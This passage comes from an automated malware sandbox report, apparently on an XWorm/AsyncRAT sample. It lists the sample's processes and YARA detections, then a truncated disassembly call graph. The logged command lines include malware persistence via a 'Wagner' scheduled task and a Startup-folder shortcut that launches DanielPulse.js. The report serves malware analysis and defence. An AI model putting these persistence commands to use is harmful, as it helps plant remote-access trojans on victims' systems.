                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:30
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:choice /d y /t 5
                                                                          Imagebase:0xa60000
                                                                          File size:28'160 bytes
                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:31
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:32
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:33
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
                                                                          Imagebase:0x360000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:34
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:35
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:36
                                                                          Start time:13:08:00
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                                                          Imagebase:0x7ff7c6950000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:37
                                                                          Start time:13:08:03
                                                                          Start date:12/12/2024
                                                                          Path:C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
                                                                          Imagebase:0x8e0000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:38
                                                                          Start time:13:08:09
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                                                          Imagebase:0x7ff7c6950000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:41
                                                                          Start time:13:10:14
                                                                          Start date:12/12/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
                                                                          Imagebase:0xc70000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:17.8%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:20.7%
                                                                            Total number of Nodes:1526
                                                                            Total number of Limit Nodes:33
                                                                            execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 